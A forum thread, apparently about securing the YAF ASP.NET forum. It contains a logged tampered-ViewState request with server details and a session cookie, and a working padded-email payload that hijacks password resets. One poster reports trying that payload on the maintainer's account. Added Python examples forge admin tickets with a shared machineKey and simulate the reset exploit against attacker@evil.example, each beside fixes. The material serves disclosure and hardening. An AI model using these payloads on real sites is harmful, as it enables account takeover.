ddscart wrote: It bothered me big time that each time a page was loaded, the screen would scroll down to the bottom to the chat box. The “Message” input textbox had “setFocus” set. Go to “Chat.aspx” and at the bottom find “setFocus('mytext');” and delete it. The forum will no longer jump to the bottom. The chat in the box disappears after some period of time; is that normal? Where is the data stored? The forum I have this in is a total test forum, so nothing good is there. Here is the chat box though: http://ddscart.org/
Nice to get credit for someone else's code. That chat implementation (with setFocus) is my attempt, made somewhere in 2006. Glad to see you still stick with it now, when there are a lot of frameworks like jQuery ....
The request.UrlReferrer is taken from the request, so it could be manipulated if I mess with the request. The easy way to protect is to add this to web.config:
Code:<pages validateRequest="true" viewStateEncryptionMode="Auto" enableViewStateMac="true" />
This is an XSS attempt on my forum:
Code:
System.Web.HttpException: The state information is invalid for this page and might be corrupted. ---> System.Web.UI.ViewStateException: Invalid viewstate.
Client IP: 200.65.0.25
Port: 49677
User-Agent: Opera/9.0 (Windows NT 5.1; U; en)
ViewState: /wEPDwULLTE3OTU2NDUzNTYPZBYCAgUPZBYCZg9kFgJmD2QWAgIBDxYCHgRUZXh0Bd4mPG9wdGdyb3VwIGxhYmVsPSI3IFBpVGlDaSAtIFBMQU5VTCBDQVNVVEVJIENFTE9SIDcgUElUSUNJIiBzdHlsZT0iY29sb3I6Z3JlZW47Ij48b3B0aW9uIHZhbHVlPSIyMjMiIHN0eWxlPSJjb2xvcjpibHVlOyI Q0UgR0FTSVRJIElOIENBU1VUQSBDRUxPUiA3IFBpVGlDaTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9IjY0IiBzdHlsZT0iY29sb3I6Ymx1ZTsiPkhFTFA8L29wdGlvbj48b3B0aW9uIHZhbHVlPSI2MiIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5QUk9QVU5FUkk8L29wdGlvbj48L29wdGdyb3VwPjxvcHRncm91cCBsYWJlbD0iJmx0O0ImZ3Q7Jmx0O0kmZ3Q7TUlSQUNPTFVMIFZJRVRJSSAtIERFIExBIERPUklOVEEgTEEgQkVCRSZsdDsvSSZndDsiIHN0eWxlPSJjb2xvcjpncmVlbjsiPjxvcHRpb24gdmFsdWU9IjEiIHN0eWxlPSJjb2xvcjpibHVlOyI UFJFQ09OQ0VQVElFPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iMiIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5TQVJDSU5BPC9vcHRpb24 PG9wdGlvbiB2YWx1ZT0iNCIgc3R5bGU9ImNvbG9yOmJsdWU7Ij5OQVNURVJFQTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9IjUiIHN0eWxlPSJjb2xvcjpibHVlOyI SU5GTyBTUElUQUxFIHNpIERPQ1RPUkk8L29wdGlvbj48L29wdGdyb3Vw...
---> System.FormatException: Invalid length for a Base-64 char array.
   at System.Convert.FromBase64String(String s)
   at System.Web.UI.ObjectStateFormatter.Deserialize(String inputString)
   at System.Web.UI.ObjectStateFormatter.System.Web.UI.IStateFormatter.Deserialize(String serializedState)
   at System.Web.UI.Util.DeserializeWithAssert(IStateFormatter formatter, String serializedState)
   at System.Web.UI.HiddenFieldPageStatePersister.Load()
   --- End of inner exception stack trace ---
   --- End of inner exception stack trace ---
   at System.Web.UI.ViewStateException.ThrowError(Exception inner, String persistedState, String errorPageMessage, Boolean macValidationError)
   at System.Web.UI.HiddenFieldPageStatePersister.Load()
   at System.Web.UI.Page.LoadPageStateFromPersistenceMedium()
   at System.Web.UI.Page.LoadAllState()
   at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
   at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
   at System.Web.UI.Page.ProcessRequest()
   at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
   at System.Web.UI.Page.ProcessRequest(HttpContext context)
   at ASP.default_aspx.ProcessRequest(HttpContext context)
   at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
   at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)

Message: The state information is invalid for this page and might be corrupted.
Source: System.Web
StackTrace:
   at System.Web.UI.ViewStateException.ThrowError(Exception inner, String persistedState, String errorPageMessage, Boolean macValidationError)
   at System.Web.UI.HiddenFieldPageStatePersister.Load()
   at System.Web.UI.Page.LoadPageStateFromPersistenceMedium()
   at System.Web.UI.Page.LoadAllState()
   at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
   at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
   at System.Web.UI.Page.ProcessRequest()
   at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
   at System.Web.UI.Page.ProcessRequest(HttpContext context)
   at ASP.default_aspx.ProcessRequest(HttpContext context)
   at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
   at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
TargetSite: Void ThrowError(System.Exception, System.String, System.String, Boolean)

QueryString:
  g: search
Form:
  ddlForum: 51
  ddlResInPage: 10
  ddlSearchWhere: 1
  ddlSearchWhat: 1
  __VIEWSTATE: (the same ViewState value quoted in the exception above)
  txtSearchString: best search engines law porn movie ,best search engines law porn movie ,best search engines law porn movie ,best search engines law porn movie ,best search engines law porn movie ,http://dzheker-top-top.blogspot.com

ServerVariables:
  ALL_HTTP / ALL_RAW / HTTP_* (the request headers, listed once):
    Pragma: no-cache
    Via: 1.1 cache-mex-sanjuan-1 (NetCache NetApp/5.4R2D2)
    Content-Length: 9528
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Expect: 100-continue
    Host: forum.top-solutions.ro
    Referer: http://forum.top-solutions.ro/default.aspx?g=search
    User-Agent: Opera/9.0 (Windows NT 5.1; U; en)
    X-Forwarded-For: 75.126.21.170
    X-Rewrite-URL: /default.aspx?g=search
  APPL_MD_PATH: /LM/w3svc/1012405505/root
  APPL_PHYSICAL_PATH: H:\Home\WU_001054_e4a68e7a5868b5ee530b64f0c7b73cfc\Webs\top-solutions.ro\forum\
  AUTH_TYPE, AUTH_USER, AUTH_PASSWORD, LOGON_USER, REMOTE_USER: (empty)
  CERT_COOKIE, CERT_FLAGS, CERT_ISSUER, CERT_KEYSIZE, CERT_SECRETKEYSIZE, CERT_SERIALNUMBER, CERT_SERVER_ISSUER, CERT_SERVER_SUBJECT, CERT_SUBJECT: (empty)
  CONTENT_LENGTH: 9528
  CONTENT_TYPE: application/x-www-form-urlencoded
  GATEWAY_INTERFACE: CGI/1.1
  HTTPS: off
  HTTPS_KEYSIZE, HTTPS_SECRETKEYSIZE, HTTPS_SERVER_ISSUER, HTTPS_SERVER_SUBJECT: (empty)
  INSTANCE_ID: 1012405505
  INSTANCE_META_PATH: /LM/W3SVC/1012405505
  LOCAL_ADDR: 88.86.103.168
  PATH_INFO: /default.aspx
  PATH_TRANSLATED: H:\Home\WU_001054_e4a68e7a5868b5ee530b64f0c7b73cfc\Webs\top-solutions.ro\forum\default.aspx
  QUERY_STRING: g=search
  REMOTE_ADDR: 200.65.0.25
  REMOTE_HOST: 200.65.0.25
  REMOTE_PORT: 49677
  REQUEST_METHOD: POST
  SCRIPT_NAME: /default.aspx
  SERVER_NAME: forum.top-solutions.ro
  SERVER_PORT: 80
  SERVER_PORT_SECURE: 0
  SERVER_PROTOCOL: HTTP/1.1
  SERVER_SOFTWARE: Microsoft-IIS/6.0
  URL: /default.aspx
Session: (empty)
Application:
  BannedIP: System.Collections.Generic.Dictionary`2[System.UInt32,System.UInt32]
  yaf_BoardSettings.1: yaf.BoardSettings
Cookies:
  ASP.NET_SessionId: ntpzcj55etge3b55b2getx45
Nice check, but it is not enough. Maybe you can take this into consideration: http://msdn2.microsoft.com/en-us/security/aa973814.aspx
I can't search on this forum. Is the search feature disabled, or is it a bug?
You are right, my mistake. I use this comma separated, but it is true, not in the constructor. See http://msdn2.microsoft.com/en-us/library/5k0ddab0(vs.80).aspx at the bottom. Otherwise the comma-separated form is perfect.
Why not? When you form the mail you take the string I enter, and so the To field is your address + 50 spaces + , + my address, and this is a legal To field with multiple recipients.
Jaben, I hope you take this as a test and not as a hacking attempt. I'm also curious about the technique used to change the admin pass.
Yes, it works. I reset the pass for jaben using recover with jaben and 'jaben@tinygecko.com_______________________________________________________ , myemailaddress@host.com' (replace _ with spaces). I saw the message that your password was sent, but I did not receive the mail (maybe jaben has already stopped the services).
Jaben wrote: Sorry folks... that was actually due to a bug in YAF IP banning. Nothing to do with hacking. Also, my initial thoughts about the break-in: my machineKey (for encoding viewstate) was the same as the distributed YAF release v1.9.1 (in the .config). So they were figuring out a way to manipulate the view state and then post it. Obviously, the key is no longer the one distributed, and I strongly suggest everyone generate their OWN key for their web.config file, just in case: http://www.developmentno...achinekey_generator.aspx
And by the way, why do you use a custom machine key? The only time I needed to use that was when I wrote an application which ran on a cluster and I needed to pass the authentication ticket to several distinct machines. Then it is even simpler. The machineKey is used to encrypt the authentication ticket; they don't need to manipulate the view state. They can produce an authentication cookie on their machine for whatever user they want and then serve it to your site. (I think ....) http://support.microsoft.com/kb/910443
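The point made in the last two posts (the enableViewStateMac setting and the machineKey shipped inside the distributed web.config), as an added example in Python. This is not YAF's code and not code from anyone in the thread: it stands in for ASP.NET's keyed ViewState MAC and forms-authentication ticket with a plain HMAC-SHA256 over a payload, so the real ObjectStateFormatter and FormsAuthentication formats are not reproduced. DISTRIBUTED_KEY, the payload strings and the key sizes in generate_machine_key are assumptions chosen for the demonstration.

```python
"""
Added example, not code from YAF or from anyone in this thread.

ASP.NET keys both the ViewState MAC (enableViewStateMac) and the forms
authentication ticket with the validationKey/decryptionKey from <machineKey>.
This toy stands in for that with a plain HMAC-SHA256 over a payload; the real
ObjectStateFormatter and FormsAuthentication wire formats are not reproduced.
"""
import base64
import binascii
import hashlib
import hmac
import secrets
from typing import Dict, Optional

MAC_LEN = hashlib.sha256().digest_size  # 32 bytes

# Stand-in for the key that ships inside a distributed web.config (constructed
# value). Anyone who downloaded the same release knows it, so it is public.
DISTRIBUTED_KEY = bytes.fromhex("0123456789abcdef" * 8)


def sign(payload: bytes, key: bytes) -> str:
    """base64(payload || HMAC(key, payload)): the shape of a MAC-protected field."""
    mac = hmac.new(key, payload, hashlib.sha256).digest()
    return base64.b64encode(payload + mac).decode("ascii")


def verify(token: str, key: bytes) -> Optional[bytes]:
    """Return the payload if the MAC is valid under `key`, otherwise None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None  # the "Invalid length for a Base-64 char array" class of failure
    if len(raw) < MAC_LEN:
        return None
    payload, mac = raw[:-MAC_LEN], raw[-MAC_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        return None
    return payload


def forge_as_admin(key: bytes) -> str:
    """An attacker who knows the server's key mints a ticket for any user."""
    # Constructed payload; a real forms-auth ticket carries more fields.
    return sign(b"user=admin;role=Administrator", key)


def tamper(token: str) -> str:
    """Flip one bit of the payload without knowing any key."""
    raw = bytearray(base64.b64decode(token))
    raw[0] ^= 0x01
    return base64.b64encode(bytes(raw)).decode("ascii")


def demo() -> Dict[str, bool]:
    """Shared key: forged ticket accepted. Fresh per-site key: rejected."""
    forged = forge_as_admin(DISTRIBUTED_KEY)
    fresh_key = secrets.token_bytes(64)
    return {
        "forged_accepted_by_shared_key": verify(forged, DISTRIBUTED_KEY) is not None,
        "forged_accepted_by_fresh_key": verify(forged, fresh_key) is not None,
        "tampered_accepted": verify(tamper(sign(b"user=guest", fresh_key)), fresh_key) is not None,
    }


def generate_machine_key() -> str:
    """A web.config <machineKey> element with fresh random keys.

    Sizes follow the ASP.NET 2.0-era convention (an assumption here): 64 random
    bytes for the SHA1/HMAC validationKey (128 hex digits), 32 bytes for AES
    (64 hex digits).
    """
    validation = secrets.token_hex(64).upper()
    decryption = secrets.token_hex(32).upper()
    return (
        f'<machineKey validationKey="{validation}" decryptionKey="{decryption}" '
        'validation="SHA1" decryption="AES" />'
    )


if __name__ == "__main__":
    print(demo())
    print(generate_machine_key())
```

The MAC only proves that whoever produced the token knew the key; when the key is the one in every copy of the release, that is everyone, which is why the thread's advice is to generate a per-site key rather than to rely on enableViewStateMac alone.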
One method could be this:
I go to recover password. I know the user I want to hack, e.g. Jaben. I know his email address (I think it is somewhere in this forum). I put in the user name and the correct email address and, surprise, I reset Jaben's password just by providing a correct username and address. And the bug is this: when the email is sent with the new password, the email is taken from "LostEmail.Text" and this can be as long as I want, but the stored procedure which makes the verification will truncate the email to 50 characters, so if I put in the email field something like 'jaben.email@aaaa.com____________________________________________________________;my.email.adress.over.50.space.carracters@bbb.com' I will receive the new password (substitute _ with spaces).
Code:yaf_user_recoverpassword 1,'Jaben','jaben.email@aaaa.com____________________________________________________________;my.email.adress.over.50.space.carracters@bbb.com'
will give Jaben's id. I don't know if this is the method used, but this is also valid. The email address must also be taken from the db and not from the input, and you must also put the new password in a secondary field, not just reset the user password based on such well-known data as username and email address. (Sorry for my English, I hope you got the idea.)
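The padded-address trick described in the posts above (the To field built as the victim's address + spaces + a separator + the attacker's address, and the stored procedure that truncates the submitted email to 50 characters), as an added example in Python beside a hardened version. This is not YAF's code. It assumes, beyond what the posts say, a 50-character email column with the parameter declared nvarchar(50), SQL Server's trailing-space-insensitive = comparison, and a mail sender that splits the To field on ',' or ';'; the account, addresses and function names are constructed for the demonstration.

```python
"""
Added example, not YAF's code: the password-recovery flaw described in this
thread, simulated in Python beside a hardened version.

Assumptions that are not in the posts: the Email column is 50 characters and the
stored procedure takes the submitted address as nvarchar(50), so it is silently
cut to 50 characters before the comparison; SQL Server's = ignores trailing
spaces, which is what makes the padding trick pass; and the mail sender splits
the To field on ',' or ';' into several recipients.
"""
import re
import secrets
from typing import Dict, List, Optional

EMAIL_COLUMN_WIDTH = 50

# Constructed sample account: the username is from the thread, the address is made up.
USERS: Dict[str, Dict[str, str]] = {
    "Jaben": {"email": "jaben@example.com", "password": "old-secret"},
}


def sql_param_compare(stored: str, submitted: str) -> bool:
    """Mimic `WHERE Email = @Email` with @Email declared nvarchar(50)."""
    truncated = submitted[:EMAIL_COLUMN_WIDTH]          # parameter-width truncation
    return stored.rstrip(" ") == truncated.rstrip(" ")   # = ignores trailing spaces


def split_recipients(to_field: str) -> List[str]:
    """Split a To field on ',' or ';', as a multi-recipient mail header is parsed."""
    return [a.strip() for a in re.split(r"[;,]", to_field) if a.strip()]


def recover_password_vulnerable(username: str, submitted_email: str) -> Optional[List[str]]:
    """The flow the post describes: match user+email, reset the password, mail
    the new password to the *submitted* text. Returns the recipient list."""
    user = USERS.get(username)
    if user is None or not sql_param_compare(user["email"], submitted_email):
        return None
    user["password"] = secrets.token_urlsafe(8)          # password overwritten on the spot
    return split_recipients(submitted_email)             # bug: To comes from the form


def recover_password_fixed(username: str, submitted_email: str) -> Optional[List[str]]:
    """Hardened as the post suggests: compare the untruncated value, mail only
    the stored address, and leave the password alone; issue a one-time token
    kept in a separate field instead."""
    user = USERS.get(username)
    if user is None:
        return None
    if len(submitted_email) > EMAIL_COLUMN_WIDTH:        # could never equal a stored value
        return None
    if user["email"].lower() != submitted_email.strip().lower():
        return None
    user["reset_token"] = secrets.token_urlsafe(16)      # secondary field, password untouched
    return [user["email"]]                               # recipient taken from the DB


def attack_string(victim_email: str, attacker_email: str, sep: str = ";") -> str:
    """Pad the victim's address past the 50-character boundary, then append
    the attacker's address, as in the thread (the underscores there are spaces)."""
    padding = " " * (EMAIL_COLUMN_WIDTH - len(victim_email) + 1)
    return f"{victim_email}{padding}{sep}{attacker_email}"


if __name__ == "__main__":
    payload = attack_string("jaben@example.com", "attacker@evil.example")
    print("vulnerable sends to:", recover_password_vulnerable("Jaben", payload))
    print("fixed sends to:", recover_password_fixed("Jaben", payload))
```

The comparison passes because everything after column 50 is dropped before the equality test and the trailing spaces that remain are ignored, while the mailer sees the full string with both recipients; the fixed version never lets the two views of the address diverge.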